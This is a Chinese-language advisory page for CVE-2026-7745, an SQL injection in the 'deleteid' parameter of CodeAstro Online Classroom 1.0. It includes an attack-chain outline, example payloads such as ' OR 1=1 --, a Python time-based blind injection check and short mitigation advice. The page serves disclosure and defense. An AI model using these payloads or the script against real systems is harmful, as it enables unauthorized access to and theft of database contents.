CVE-2026-7745 CVSS 6.3 中危

CVE-2026-7745: CodeAstro Online Classroom SQL注入漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7745

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Online Classroom

漏洞概述

CodeAstro Online Classroom 1.0版本存在SQL注入漏洞。该漏洞位于/OnlineClassroom/facultydetails组件中，由于未正确过滤用户输入的“deleteid”参数，导致攻击者可构造恶意SQL语句进行远程攻击。成功利用此漏洞可能导致敏感信息泄露、数据完整性受损及可用性降低。鉴于漏洞利用细节已公开，受影响系统面临较高安全风险。

技术细节

该漏洞根因在于CodeAstro Online Classroom 1.0应用程序对用户输入数据缺乏严格的过滤与验证机制。在/OnlineClassroom/facultydetails文件的处理逻辑中，系统直接获取HTTP请求中的“deleteid”参数，并将其动态拼接至后台SQL查询语句中执行，未使用参数化查询或存储过程等安全防御手段。攻击者可利用这一缺陷，构造包含特定SQL语法的恶意Payload（例如 `' OR 1=1 --` 或基于UNION的查询语句），通过修改“deleteid”参数值发送至服务器。一旦服务器执行该恶意SQL语句，攻击者即可绕过身份验证，提取数据库结构，窃取管理员凭证或用户敏感信息。鉴于CVSS评分显示攻击无需用户交互且网络可达，该漏洞极易被自动化工具大规模扫描利用。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标为CodeAstro Online Classroom系统，并确定存在facultydetails接口。

STEP 2

2. 漏洞探测

攻击者向/OnlineClassroom/facultydetails发送带有恶意SQL语句的deleteid参数，测试数据库响应。

STEP 3

3. 注入执行

应用程序未过滤参数，直接将恶意SQL代码传输至数据库引擎执行。

STEP 4

4. 数据窃取或破坏

攻击者利用SQL注入获取敏感数据、绕过认证或修改数据库内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def verify_sql_injection(url):
    """This script checks for SQL injection in the deleteid parameter."""
    target_url = f"{url}/OnlineClassroom/facultydetails"
    # Payload to test for time-based blind SQL injection
    payload = "1 AND SLEEP(5)-- -"
    
    params = {
        "deleteid": payload
    }
    
    try:
        print(f"[+] Sending request to: {target_url}")
        response = requests.get(target_url, params=params, timeout=10)
        
        if response.elapsed.total_seconds() >= 5:
            print("[!] Vulnerability confirmed: SQL Injection detected via time delay.")
        else:
            print("[-] Vulnerability not detected or payload failed.")
            
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    verify_sql_injection(target)

影响范围

CodeAstro Online Classroom 1.0

防御指南

临时缓解措施

在无法立即修复代码的情况下，建议在网络边界部署Web应用防火墙（WAF），配置规则拦截针对deleteid参数的SQL注入攻击。同时，检查数据库日志并隔离受影响的服务器以防止进一步损害。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7745
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7745
3 Details https://www.cvedetails.com/cve/CVE-2026-7745/
4 VulDB https://vuldb.com/cve/CVE-2026-7745
5 Link https://codeastro.com/
6 Link https://github.com/yuji0903/silver-guide/issues/22
7 Link https://vuldb.com/submit/807697
8 Link https://vuldb.com/vuln/360920
9 Link https://vuldb.com/vuln/360920/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表